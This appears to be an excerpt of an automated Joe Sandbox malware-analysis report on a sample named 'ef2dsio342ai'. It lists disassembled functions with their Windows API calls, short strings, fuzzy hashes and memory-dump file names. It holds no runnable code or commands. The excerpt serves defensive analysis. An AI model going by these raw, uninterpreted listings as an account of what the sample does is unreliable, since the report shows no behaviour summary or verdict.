                                                                                                      • Instruction ID: a66ecca086b76f3a8e79c9c6d1d84670c7273702a3426ee731a58e9f7f744010
                                                                                                      • Opcode Fuzzy Hash: 22a2a250079216a4fb6bc96a55df862ab42e51232b2a3f681037dae0298c7b53
                                                                                                      • Instruction Fuzzy Hash: 6461B171608245DFDB14CF28C880A5AB7E9FF893A4F510B6DFC9597285E730E984CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(00000000), ref: 00D2F6E9
                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D2F702
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                      • String ID: @
                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                      • Opcode ID: 23582fe2f2bad629bc8ea505df8edd80356959dffed7a8663a9268a8a948f17a
                                                                                                      • Instruction ID: df4638ab788f3dffde6139cadf97818792423ae91c439cddbb0a4204cb644718
                                                                                                      • Opcode Fuzzy Hash: 23582fe2f2bad629bc8ea505df8edd80356959dffed7a8663a9268a8a948f17a
                                                                                                      • Instruction Fuzzy Hash: CC5135B1508745ABD320AF10EC86BABBBE8FF94310F818C5DF199811A1DF708569CB76
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _memmove
                                                                                                      • String ID: invalid string position$string too long
                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                      • Opcode ID: b2098208843c8262370a0e03b45232cfd48394d3156f495124b033daef2163b6
                                                                                                      • Instruction ID: d55423f42d17489d55fa62e55d515311aa8723bb96e9fbe3076f54aff4b5d4bb
                                                                                                      • Opcode Fuzzy Hash: b2098208843c8262370a0e03b45232cfd48394d3156f495124b033daef2163b6
                                                                                                      • Instruction Fuzzy Hash: 6E31D3323047109BE722CE5CF880B5BF7AAEB916A0F11462FE545CB259C7B1D94087A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                                      • String ID: CALLARGARRAY
                                                                                                      • API String ID: 157775604-1150593374
                                                                                                      • Opcode ID: fb50b008abb296723899f15197c813e8cda39ce1883fce662764abfd2d9cb239
                                                                                                      • Instruction ID: 75808c4d99060df101f79960bfdf2df13f735f5c4fa796217bd5f81b759f65ee
                                                                                                      • Opcode Fuzzy Hash: fb50b008abb296723899f15197c813e8cda39ce1883fce662764abfd2d9cb239
                                                                                                      • Instruction Fuzzy Hash: 94418F71A002199FCF04EFA9C8958EEBBB5EF59324F144169E506A7352EB70DD81CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _wcslen.LIBCMT ref: 00D8DA8D
                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00D8DA97
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CrackInternet_wcslen
                                                                                                      • String ID: |
                                                                                                      • API String ID: 596671847-2343686810
                                                                                                      • Opcode ID: d9c97d7859561386090a4a16d76dc905f52026ab0abceda660d33412c173edd4
                                                                                                      • Instruction ID: 8a4cd8305b2db4d2428bc2d7a7252af381c2e14137a30e90a8806097064be8dc
                                                                                                      • Opcode Fuzzy Hash: d9c97d7859561386090a4a16d76dc905f52026ab0abceda660d33412c173edd4
                                                                                                      • Instruction Fuzzy Hash: 54313B71800119ABCF05EFA5DC85EEEBFB9FF18310F100019F815A62A6DB31AA55DBB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00DA3F80
                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DA3FBB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$DestroyMove
                                                                                                      • String ID: static
                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                      • Opcode ID: acc209235ac48a8e24e7149ea4ec359be212a714a43e3c18c326001aa26ce6fd
                                                                                                      • Instruction ID: 204698a123d49fcd488d2e77f9e1690703e07e7d3207220f8d72bbac45134230
                                                                                                      • Opcode Fuzzy Hash: acc209235ac48a8e24e7149ea4ec359be212a714a43e3c18c326001aa26ce6fd
                                                                                                      • Instruction Fuzzy Hash: 5F317E71510604AEDB149F28CC81AFB73BAFF89724F04861DF9AA97190DA70ED81D770
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00DA4F7E
                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DA4F93
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID: '
                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                      • Opcode ID: dc88c44c5c573dc29b80a2b2622a41e55f603f3be183b0d6c0b6a14b8e273f9e
                                                                                                      • Instruction ID: 459bff6fb73a08bad9e13f19004c11c6ee31f6b32d710b5c3af672ce27be9a99
                                                                                                      • Opcode Fuzzy Hash: dc88c44c5c573dc29b80a2b2622a41e55f603f3be183b0d6c0b6a14b8e273f9e
                                                                                                      • Instruction Fuzzy Hash: 34311A74A013099FDB14CFA9C881BDABBB5FF89304F14516AE905AB351D7B0A941CFA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DA3BDB
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DA3BE6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID: Combobox
                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                      • Opcode ID: c4391842eaae16b2a6576ef09f1ff5a1274fcf10900ec0fcb56b7fff7ddd7a9f
                                                                                                      • Instruction ID: 9b695edc16a241d90ed76f9dc518082712fcb34307a1e9f268a6e4e0afdfbb2d
                                                                                                      • Opcode Fuzzy Hash: c4391842eaae16b2a6576ef09f1ff5a1274fcf10900ec0fcb56b7fff7ddd7a9f
                                                                                                      • Instruction Fuzzy Hash: 7B1182712002087FEF259F58CC81EFB37ABEB8A3A4F144125F919972A1D671DD519BB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D17759
                                                                                                        • Part of subcall function 00D1771B: GetStockObject.GDI32(00000011), ref: 00D1776D
                                                                                                        • Part of subcall function 00D1771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D17777
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00DA40D9
                                                                                                      • GetSysColor.USER32(00000012), ref: 00DA40F3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                      • String ID: static
                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                      • Opcode ID: c2c2f1427fd32a05c344ad04cf8060c56a6d4b395eaa8966e26914b3924a628c
                                                                                                      • Instruction ID: b51bb8b7938c5666e37240eb574688076331b715568a4b72ba6cdcf35a26369a
                                                                                                      • Opcode Fuzzy Hash: c2c2f1427fd32a05c344ad04cf8060c56a6d4b395eaa8966e26914b3924a628c
                                                                                                      • Instruction Fuzzy Hash: EC113772610209AFDB00DFB8CC46AFA7BB8FB49314F044924FD56E3250E674E891DB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D8D6DA
                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D8D703
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Internet$OpenOption
                                                                                                      • String ID: <local>
                                                                                                      • API String ID: 942729171-4266983199
                                                                                                      • Opcode ID: cb32e5b16399830b7927b87b4262f18ef28241e1c5c214ed10fdfecb0134211f
                                                                                                      • Instruction ID: f1055a3b121d78ec641a091c7842f7686aec0942c8cda3ec1943e243f8b514ce
                                                                                                      • Opcode Fuzzy Hash: cb32e5b16399830b7927b87b4262f18ef28241e1c5c214ed10fdfecb0134211f
                                                                                                      • Instruction Fuzzy Hash: 1111C67110523ABAD7285B669C46EF7BF9EEB127A4F00421AB14ED31C0E7609C40D7F0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00DA3E0A
                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DA3E19
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                      • String ID: edit
                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                      • Opcode ID: ea100d373ea93c6c33764b60152b38faf408b049923fbdaafe3dae74451c2a7c
                                                                                                      • Instruction ID: 5f8b7ecefd53a4ee2da6cfab9276ce29f53255cfa89a2c5e9d8f59799dae5251
                                                                                                      • Opcode Fuzzy Hash: ea100d373ea93c6c33764b60152b38faf408b049923fbdaafe3dae74451c2a7c
                                                                                                      • Instruction Fuzzy Hash: C6114C71500208ABEF109F64DC84AFB3BAAEB17368F544714F961971E0C775DD519B70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00D77545
                                                                                                      • _wcslen.LIBCMT ref: 00D77551
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                      • String ID: STOP
                                                                                                      • API String ID: 1256254125-2411985666
                                                                                                      • Opcode ID: 484e55c854bc2ca64ef2b0bb9c039b0f9424447b98ae15531fab356d207644b4
                                                                                                      • Instruction ID: 4abccf8b7f13c8edf0b732d938c11fd71b294e40f8435ea4b7f3c4b3cbe5e138
                                                                                                      • Opcode Fuzzy Hash: 484e55c854bc2ca64ef2b0bb9c039b0f9424447b98ae15531fab356d207644b4
                                                                                                      • Instruction Fuzzy Hash: 1501A532A181265BCB109FBDDC409BF77B5FF657547144924E81596291FB34D940C770
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                        • Part of subcall function 00D74536: GetClassNameW.USER32(?,?,000000FF), ref: 00D74559
                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D725DC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                      • String ID: ComboBox$ListBox
                                                                                                      • API String ID: 624084870-1403004172
                                                                                                      • Opcode ID: a9214082c9246918b19781a4a7228decfc243884ea47bf201c49db28bb9f710c
                                                                                                      • Instruction ID: d31db4269442ff31e4a23fb6719d95a1a505a19ca32e95e1e745695e6a0b205a
                                                                                                      • Opcode Fuzzy Hash: a9214082c9246918b19781a4a7228decfc243884ea47bf201c49db28bb9f710c
                                                                                                      • Instruction Fuzzy Hash: CE01B571600255ABCB18EBA4DC61CFE7765EF56320B04461AA867973D6FF30980C9670
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                        • Part of subcall function 00D74536: GetClassNameW.USER32(?,?,000000FF), ref: 00D74559
                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D724D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                      • String ID: ComboBox$ListBox
                                                                                                      • API String ID: 624084870-1403004172
                                                                                                      • Opcode ID: ee7138b18e75e0412f9843d2a2a00a67647dcfd2242a74f8658fb639e9c7b0b1
                                                                                                      • Instruction ID: a4ec15383d891cc1756b5b5e9adc33efe38a52a521621908df7a1bc67cd7de05
                                                                                                      • Opcode Fuzzy Hash: ee7138b18e75e0412f9843d2a2a00a67647dcfd2242a74f8658fb639e9c7b0b1
                                                                                                      • Instruction Fuzzy Hash: C901A771A40149BBDB29EBA0D851EFF77A8DF65354F14401B654663282EF609E0CC6B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                        • Part of subcall function 00D74536: GetClassNameW.USER32(?,?,000000FF), ref: 00D74559
                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D72558
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                      • String ID: ComboBox$ListBox
                                                                                                      • API String ID: 624084870-1403004172
                                                                                                      • Opcode ID: 6d02606808c2e135b5b1f42ee81866d9c6c748f738ef3519a1d9bfdc6137698a
                                                                                                      • Instruction ID: dc717391867007fe740c76ff7ead5b61d5956964f40a950a9025cc31eccc303d
                                                                                                      • Opcode Fuzzy Hash: 6d02606808c2e135b5b1f42ee81866d9c6c748f738ef3519a1d9bfdc6137698a
                                                                                                      • Instruction Fuzzy Hash: 5101A271640149BBCB15EBA4D922EFF77A8DB11B40F14411A7846A3282FA24DE0C8671
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                        • Part of subcall function 00D74536: GetClassNameW.USER32(?,?,000000FF), ref: 00D74559
                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00D72663
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                      • String ID: ComboBox$ListBox
                                                                                                      • API String ID: 624084870-1403004172
                                                                                                      • Opcode ID: 8041f7e8e47f0cd6ec615676c7c908f70aa93ac1676098bf91f2f864812fbc14
                                                                                                      • Instruction ID: a81ece9fc17bb47a92ccc06eed89f37ab24918e6326bf4f7657388901a1e5135
                                                                                                      • Opcode Fuzzy Hash: 8041f7e8e47f0cd6ec615676c7c908f70aa93ac1676098bf91f2f864812fbc14
                                                                                                      • Instruction Fuzzy Hash: A2F0A471A40259BACB18F7A49C52FFF7768EF11724F040A17B466A32C2EF60990C8274
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen
                                                                                                      • String ID: 3, 3, 16, 1
                                                                                                      • API String ID: 176396367-3042988571
